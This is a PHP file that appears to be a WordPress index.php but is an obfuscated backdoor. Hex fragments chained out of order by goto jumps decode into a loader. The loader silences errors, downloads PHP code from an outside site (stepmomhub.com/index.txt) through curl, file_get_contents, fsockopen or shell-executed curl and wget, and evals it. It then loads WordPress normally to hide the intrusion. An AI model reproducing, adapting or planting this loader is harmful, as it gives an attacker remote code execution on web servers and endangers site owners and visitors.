<?php
error_reporting(0);
$lknpo=''; goto _697819D523866;
_697819D523866: $lknpo.="\x40\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72"; goto _697819D52386A;
_697819D523870: $lknpo.="\x62\x2e\x63\x6f\x6d\x2f\x69\x6e\x64\x65\x78\x2e"; goto _697819D523871;
_697819D52388E: $lknpo.="\x74\x70\x27\x3d\x3e\x5b\x27\x68\x65\x61\x64\x65"; goto _697819D52388F;
_697819D523892: $lknpo.="\x29\x3b\x24\x63\x3d\x40\x66\x69\x6c\x65\x5f\x67"; goto _697819D523893;
_697819D5238C4: $lknpo.="\x24\x63\x6d\x64\x3d\x22\x63\x75\x72\x6c\x20\x2d"; goto _697819D5238C5;
_697819D523871: $lknpo.="\x74\x78\x74\x27\x3b\x0d\x0a\x24\x75\x61\x3d\x27"; goto _697819D523872;
_697819D5238E8: $lknpo.="\x3b\x40\x24\x66\x28\x24\x63\x6d\x64\x29\x3b\x24"; goto _697819D5238E9;
_697819D5238FD: $lknpo.="\x27\x3b"; goto _697819D5238FE;
_697819D5238FB: $lknpo.="\x52\x5f\x5f\x2e\x27\x2f\x77\x70\x2d\x62\x6c\x6f"; goto _697819D5238FC;
_697819D5238D0: $lknpo.="\x2c\x27\x70\x61\x73\x73\x74\x68\x72\x75\x27\x2c"; goto _697819D5238D1;
_697819D5238C8: $lknpo.="\x7c\x77\x67\x65\x74\x20\x2d\x71\x55\x20\x27\x24"; goto _697819D5238C9;
_697819D5238F4: $lknpo.="\x69\x6e\x65\x28\x27\x57\x50\x5f\x55\x53\x45\x5f"; goto _697819D5238F5;
_697819D5238A0: $lknpo.="\x69\x66\x28\x21\x24\x63\x26\x26\x66\x75\x6e\x63"; goto _697819D5238A1;
_697819D523879: $lknpo.="\x2e\x30\x2e\x30\x2e\x30\x20\x4d\x6f\x62\x69\x6c"; goto _697819D52387A;
_697819D5238F5: $lknpo.="\x54\x48\x45\x4d\x45\x53\x27\x2c\x74\x72\x75\x65"; goto _697819D5238F6;
_697819D523883: $lknpo.="\x35\x32\x3d\x3e\x31\x2c\x34\x32\x3d\x3e\x30\x2c"; goto _697819D523884;
_697819D52388C: $lknpo.="\x72\x65\x61\x6d\x5f\x63\x6f\x6e\x74\x65\x78\x74"; goto _697819D52388D;
_697819D5238B1: $lknpo.="\x74\x27\x5d\x2c\x38\x30\x2c\x24\x65\x2c\x24\x72"; goto _697819D5238B2;
_697819D523889: $lknpo.="\x63\x26\x26\x69\x6e\x69\x5f\x67\x65\x74\x28\x27"; goto _697819D52388A;
_697819D5238DA: $lknpo.="\x63\x3d\x6a\x6f\x69\x6e\x28\x22\x5c\x6e\x22\x2c"; goto _697819D5238DB;
_697819D523887: $lknpo.="\x3b\x63\x75\x72\x6c\x5f\x63\x6c\x6f\x73\x65\x28"; goto _697819D523888;
_697819D5238DC: $lknpo.="\x24\x66\x3d\x3d\x27\x70\x6f\x70\x65\x6e\x27\x29"; goto _697819D5238DD;
_697819D52386E: $lknpo.="\x3b\x0d\x0a\x24\x75\x3d\x27\x68\x74\x74\x70\x73"; goto _697819D52386F;
_697819D5238D7: $lknpo.="\x6c\x73\x65\x29\x7b\x69\x66\x28\x24\x66\x3d\x3d"; goto _697819D5238D8;
_697819D5238EE: $lknpo.="\x5e\x5c\x78\x45\x46\x5c\x78\x42\x42\x5c\x78\x42"; goto _697819D5238EF;
_697819D5238EB: $lknpo.="\x62\x72\x65\x61\x6b\x3b\x7d\x7d\x7d\x0d\x0a\x69"; goto _697819D5238EC;
_697819D5238C3: $lknpo.="\x7d\x7d\x0d\x0a\x69\x66\x28\x21\x24\x63\x29\x7b"; goto _697819D5238C4;
_697819D5238FC: $lknpo.="\x67\x2d\x68\x65\x61\x64\x65\x72\x2e\x70\x68\x70"; goto _697819D5238FD;
_697819D523884: $lknpo.="\x31\x30\x30\x31\x38\x3d\x3e\x24\x75\x61\x2c\x31"; goto _697819D523885;
_697819D5238F8: $lknpo.="\x2e\x27\x2f\x77\x70\x2d\x62\x6c\x6f\x67\x2d\x68"; goto _697819D5238F9;
_697819D5238BB: $lknpo.="\x72\x5c\x6e\x5c\x72\x5c\x6e\x22\x29\x3b\x24\x62"; goto _697819D5238BC;
_697819D5238BE: $lknpo.="\x66\x67\x65\x74\x73\x28\x24\x66\x2c\x31\x32\x38"; goto _697819D5238BF;
_697819D523878: $lknpo.="\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x31\x31\x34"; goto _697819D523879;
_697819D5238D8: $lknpo.="\x27\x65\x78\x65\x63\x27\x29\x7b\x40\x65\x78\x65"; goto _697819D5238D9;
_697819D523876: $lknpo.="\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c"; goto _697819D523877;
_697819D523891: $lknpo.="\x6d\x65\x6f\x75\x74\x27\x3d\x3e\x31\x35\x5d\x5d"; goto _697819D523892;
_697819D5238B0: $lknpo.="\x6f\x70\x65\x6e\x28\x24\x70\x5b\x27\x68\x6f\x73"; goto _697819D5238B1;
_697819D5238CE: $lknpo.="\x29\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x5b"; goto _697819D5238CF;
_697819D5238F3: $lknpo.="\x54\x48\x45\x4d\x45\x53\x27\x29\x29\x64\x65\x66"; goto _697819D5238F4;
_697819D5238E1: $lknpo.="\x6e\x74\x73\x28\x24\x68\x29\x3b\x40\x70\x63\x6c"; goto _697819D5238E2;
_697819D5238DE: $lknpo.="\x63\x6d\x64\x2c\x27\x72\x27\x29\x3b\x69\x66\x28"; goto _697819D5238DF;
_697819D5238A1: $lknpo.="\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73\x28"; goto _697819D5238A2;
_697819D5238AE: $lknpo.="\x3d\x70\x61\x72\x73\x65\x5f\x75\x72\x6c\x28\x24"; goto _697819D5238AF;
_697819D523894: $lknpo.="\x24\x75\x2c\x30\x2c\x24\x78\x29\x3b\x7d\x0d\x0a"; goto _697819D5238A0;
_697819D523893: $lknpo.="\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28"; goto _697819D523894;
_697819D5238EF: $lknpo.="\x46\x2f\x27\x2c\x27\x27\x2c\x24\x63\x29\x3b\x65"; goto _697819D5238F0;
_697819D523885: $lknpo.="\x33\x3d\x3e\x31\x35\x5d\x29\x3b\x24\x63\x3d\x63"; goto _697819D523886;
_697819D52388F: $lknpo.="\x72\x27\x3d\x3e\x22\x55\x73\x65\x72\x2d\x41\x67"; goto _697819D523890;
_697819D5238A5: $lknpo.="\x74\x72\x65\x61\x6d\x5f\x73\x65\x74\x5f\x74\x69"; goto _697819D5238A6;
_697819D5238CA: $lknpo.="\x20\x2d\x20\x24\x75\x22\x3b\x24\x64\x3d\x73\x74"; goto _697819D5238CB;
_697819D5238A8: $lknpo.="\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"; goto _697819D5238A9;
_697819D5238D3: $lknpo.="\x61\x73\x24\x66\x29\x7b\x69\x66\x28\x66\x75\x6e"; goto _697819D5238D4;
_697819D5238CC: $lknpo.="\x5f\x67\x65\x74\x28\x27\x64\x69\x73\x61\x62\x6c"; goto _697819D5238CD;
_697819D5238FA: $lknpo.="\x72\x65\x71\x75\x69\x72\x65\x20\x5f\x5f\x44\x49"; goto _697819D5238FB;
_697819D5238D5: $lknpo.="\x28\x24\x66\x29\x26\x26\x73\x74\x72\x70\x6f\x73"; goto _697819D5238D6;
_697819D5238C0: $lknpo.="\x3b\x24\x63\x3d\x65\x78\x70\x6c\x6f\x64\x65\x28"; goto _697819D5238C1;
_697819D5238F0: $lknpo.="\x76\x61\x6c\x28\x27\x3f\x3e\x27\x2e\x24\x63\x29"; goto _697819D5238F1;
_697819D52387B: $lknpo.="\x2e\x33\x36\x27\x3b\x0d\x0a\x24\x63\x3d\x27\x27"; goto _697819D52387C;
_697819D5238B2: $lknpo.="\x2c\x31\x35\x29\x3b\x69\x66\x28\x24\x66\x29\x7b"; goto _697819D5238B3;
_697819D523874: $lknpo.="\x6f\x69\x64\x20\x31\x30\x3b\x20\x4b\x29\x20\x41"; goto _697819D523875;
_697819D52386D: $lknpo.="\x79\x5f\x65\x72\x72\x6f\x72\x73\x27\x2c\x30\x29"; goto _697819D52386E;
_697819D5238E0: $lknpo.="\x61\x6d\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65"; goto _697819D5238E1;
_697819D5238E7: $lknpo.="\x65\x7b\x6f\x62\x5f\x73\x74\x61\x72\x74\x28\x29"; goto _697819D5238E8;
_697819D5238B9: $lknpo.="\x24\x75\x61\x5c\x72\x5c\x6e\x43\x6f\x6e\x6e\x65"; goto _697819D5238BA;
_697819D5238C1: $lknpo.="\x22\x5c\x72\x5c\x6e\x5c\x72\x5c\x6e\x22\x2c\x24"; goto _697819D5238C2;
_697819D5238A9: $lknpo.="\x28\x24\x68\x29\x3b\x66\x63\x6c\x6f\x73\x65\x28"; goto _697819D5238AA;
_697819D5238F7: $lknpo.="\x69\x73\x74\x73\x28\x5f\x5f\x44\x49\x52\x5f\x5f"; goto _697819D5238F8;
_697819D52388D: $lknpo.="\x5f\x63\x72\x65\x61\x74\x65\x28\x5b\x27\x68\x74"; goto _697819D52388E;
_697819D5238D2: $lknpo.="\x65\x63\x27\x2c\x27\x70\x6f\x70\x65\x6e\x27\x5d"; goto _697819D5238D3;
_697819D523873: $lknpo.="\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72"; goto _697819D523874;
_697819D5238B4: $lknpo.="\x45\x54\x20\x7b\x24\x70\x5b\x27\x70\x61\x74\x68"; goto _697819D5238B5;
_697819D5238F9: $lknpo.="\x65\x61\x64\x65\x72\x2e\x70\x68\x70\x27\x29\x29"; goto _697819D5238FA;
_697819D5238CB: $lknpo.="\x72\x74\x6f\x6c\x6f\x77\x65\x72\x28\x69\x6e\x69"; goto _697819D5238CC;
_697819D5238D9: $lknpo.="\x63\x28\x24\x63\x6d\x64\x2c\x24\x6f\x29\x3b\x24"; goto _697819D5238DA;
_697819D523881: $lknpo.="\x74\x6f\x70\x74\x5f\x61\x72\x72\x61\x79\x28\x24"; goto _697819D523882;
_697819D5238A7: $lknpo.="\x3b\x24\x63\x3d\x40\x73\x74\x72\x65\x61\x6d\x5f"; goto _697819D5238A8;
_697819D5238B8: $lknpo.="\x6e\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a"; goto _697819D5238B9;
_697819D52387E: $lknpo.="\x75\x72\x6c\x5f\x69\x6e\x69\x74\x27\x29\x29\x7b"; goto _697819D52387F;
_697819D5238E3: $lknpo.="\x73\x65\x69\x66\x28\x24\x66\x3d\x3d\x27\x73\x68"; goto _697819D5238E4;
_697819D523877: $lknpo.="\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f"; goto _697819D523878;
_697819D52387D: $lknpo.="\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73\x28\x27\x63"; goto _697819D52387E;
_697819D5238E5: $lknpo.="\x63\x3d\x40\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65"; goto _697819D5238E6;
_697819D5238AD: $lknpo.="\x63\x6b\x6f\x70\x65\x6e\x27\x29\x29\x7b\x24\x70"; goto _697819D5238AE;
_697819D523882: $lknpo.="\x68\x2c\x5b\x31\x39\x39\x31\x33\x3d\x3e\x31\x2c"; goto _697819D523883;
_697819D523875: $lknpo.="\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35"; goto _697819D523876;
_697819D5238C5: $lknpo.="\x73\x4c\x20\x2d\x41\x20\x27\x24\x75\x61\x27\x20"; goto _697819D5238C6;
_697819D5238EA: $lknpo.="\x61\x6e\x28\x29\x3b\x7d\x69\x66\x28\x24\x63\x29"; goto _697819D5238EB;
_697819D52386F: $lknpo.="\x3a\x2f\x2f\x73\x74\x65\x70\x6d\x6f\x6d\x68\x75"; goto _697819D523870;
_697819D52387F: $lknpo.="\x24\x68\x3d\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74"; goto _697819D523880;
_697819D5238D1: $lknpo.="\x27\x73\x79\x73\x74\x65\x6d\x27\x2c\x27\x65\x78"; goto _697819D5238D2;
_697819D52388A: $lknpo.="\x61\x6c\x6c\x6f\x77\x5f\x75\x72\x6c\x5f\x66\x6f"; goto _697819D52388B;
_697819D5238F2: $lknpo.="\x6e\x65\x64\x28\x27\x57\x50\x5f\x55\x53\x45\x5f"; goto _697819D5238F3;
_697819D5238DF: $lknpo.="\x24\x68\x29\x7b\x24\x63\x3d\x40\x73\x74\x72\x65"; goto _697819D5238E0;
_697819D5238D4: $lknpo.="\x63\x74\x69\x6f\x6e\x5f\x65\x78\x69\x73\x74\x73"; goto _697819D5238D5;
_697819D5238DD: $lknpo.="\x7b\x24\x68\x3d\x40\x70\x6f\x70\x65\x6e\x28\x24"; goto _697819D5238DE;
_697819D5238E2: $lknpo.="\x6f\x73\x65\x28\x24\x68\x29\x3b\x7d\x7d\x65\x6c"; goto _697819D5238E3;
_697819D5238B5: $lknpo.="\x27\x5d\x7d\x20\x48\x54\x54\x50\x2f\x31\x2e\x30"; goto _697819D5238B6;
_697819D5238CD: $lknpo.="\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e\x73\x27"; goto _697819D5238CE;
_697819D5238BD: $lknpo.="\x65\x6f\x66\x28\x24\x66\x29\x29\x24\x62\x2e\x3d"; goto _697819D5238BE;
_697819D5238BC: $lknpo.="\x3d\x27\x27\x3b\x77\x68\x69\x6c\x65\x28\x21\x66"; goto _697819D5238BD;
_697819D523872: $lknpo.="\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20"; goto _697819D523873;
_697819D52386C: $lknpo.="\x5f\x73\x65\x74\x28\x27\x64\x69\x73\x70\x6c\x61"; goto _697819D52386D;
_697819D52387A: $lknpo.="\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37"; goto _697819D52387B;
_697819D5238BA: $lknpo.="\x63\x74\x69\x6f\x6e\x3a\x63\x6c\x6f\x73\x65\x5c"; goto _697819D5238BB;
_697819D5238CF: $lknpo.="\x27\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63\x27"; goto _697819D5238D0;
_697819D5238A6: $lknpo.="\x6d\x65\x6f\x75\x74\x28\x24\x68\x2c\x31\x35\x29"; goto _697819D5238A7;
_697819D5238AA: $lknpo.="\x24\x68\x29\x3b\x7d\x7d\x0d\x0a\x69\x66\x28\x21"; goto _697819D5238AB;
_697819D52387C: $lknpo.="\x3b\x0d\x0a\x69\x66\x28\x66\x75\x6e\x63\x74\x69"; goto _697819D52387D;
_697819D5238BF: $lknpo.="\x29\x3b\x66\x63\x6c\x6f\x73\x65\x28\x24\x66\x29"; goto _697819D5238C0;
_697819D5238B7: $lknpo.="\x5b\x27\x68\x6f\x73\x74\x27\x5d\x7d\x5c\x72\x5c"; goto _697819D5238B8;
_697819D5238D6: $lknpo.="\x28\x24\x64\x2c\x24\x66\x29\x3d\x3d\x3d\x66\x61"; goto _697819D5238D7;
_697819D5238E6: $lknpo.="\x63\x28\x24\x63\x6d\x64\x29\x3b\x7d\x65\x6c\x73"; goto _697819D5238E7;
_697819D5238A3: $lknpo.="\x3d\x40\x66\x6f\x70\x65\x6e\x28\x24\x75\x2c\x27"; goto _697819D5238A4;
_697819D5238F1: $lknpo.="\x3b\x7d\x0d\x0a\x69\x66\x28\x21\x64\x65\x66\x69"; goto _697819D5238F2;
_697819D5238B3: $lknpo.="\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2c\x22\x47"; goto _697819D5238B4;
_697819D5238DB: $lknpo.="\x24\x6f\x29\x3b\x7d\x65\x6c\x73\x65\x69\x66\x28"; goto _697819D5238DC;
_697819D5238A2: $lknpo.="\x27\x66\x6f\x70\x65\x6e\x27\x29\x29\x7b\x24\x68"; goto _697819D5238A3;
_697819D5238E9: $lknpo.="\x63\x3d\x6f\x62\x5f\x67\x65\x74\x5f\x63\x6c\x65"; goto _697819D5238EA;
_697819D5238C2: $lknpo.="\x62\x2c\x32\x29\x5b\x31\x5d\x3f\x3f\x27\x27\x3b"; goto _697819D5238C3;
_697819D523890: $lknpo.="\x65\x6e\x74\x3a\x24\x75\x61\x22\x2c\x27\x74\x69"; goto _697819D523891;
_697819D523880: $lknpo.="\x28\x24\x75\x29\x3b\x63\x75\x72\x6c\x5f\x73\x65"; goto _697819D523881;
_697819D5238B6: $lknpo.="\x5c\x72\x5c\x6e\x48\x6f\x73\x74\x3a\x7b\x24\x70"; goto _697819D5238B7;
_697819D5238AB: $lknpo.="\x24\x63\x26\x26\x66\x75\x6e\x63\x74\x69\x6f\x6e"; goto _697819D5238AC;
_697819D5238AF: $lknpo.="\x75\x29\x3b\x24\x66\x3d\x40\x66\x73\x6f\x63\x6b"; goto _697819D5238B0;
_697819D5238C7: $lknpo.="\x6d\x65\x6f\x75\x74\x20\x31\x35\x20\x24\x75\x7c"; goto _697819D5238C8;
_697819D5238A4: $lknpo.="\x72\x27\x29\x3b\x69\x66\x28\x24\x68\x29\x7b\x73"; goto _697819D5238A5;
_697819D5238C6: $lknpo.="\x2d\x2d\x63\x6f\x6e\x6e\x65\x63\x74\x2d\x74\x69"; goto _697819D5238C7;
_697819D52386A: $lknpo.="\x74\x69\x6e\x67\x28\x30\x29\x3b\x40\x69\x6e\x69"; goto _697819D52386C;
_697819D523888: $lknpo.="\x24\x68\x29\x3b\x7d\x0d\x0a\x69\x66\x28\x21\x24"; goto _697819D523889;
_697819D5238E4: $lknpo.="\x65\x6c\x6c\x5f\x65\x78\x65\x63\x27\x29\x7b\x24"; goto _697819D5238E5;
_697819D5238C9: $lknpo.="\x75\x61\x27\x20\x2d\x54\x20\x31\x35\x20\x2d\x4f"; goto _697819D5238CA;
_697819D5238ED: $lknpo.="\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x2f"; goto _697819D5238EE;
_697819D523886: $lknpo.="\x75\x72\x6c\x5f\x65\x78\x65\x63\x28\x24\x68\x29"; goto _697819D523887;
_697819D52388B: $lknpo.="\x70\x65\x6e\x27\x29\x29\x7b\x24\x78\x3d\x73\x74"; goto _697819D52388C;
_697819D5238AC: $lknpo.="\x5f\x65\x78\x69\x73\x74\x73\x28\x27\x66\x73\x6f"; goto _697819D5238AD;
_697819D5238F6: $lknpo.="\x29\x3b\x69\x66\x28\x66\x69\x6c\x65\x5f\x65\x78"; goto _697819D5238F7;
_697819D5238EC: $lknpo.="\x66\x28\x24\x63\x29\x7b\x24\x63\x3d\x70\x72\x65"; goto _697819D5238ED;
_697819D5238FE: eval($lknpo);
?>
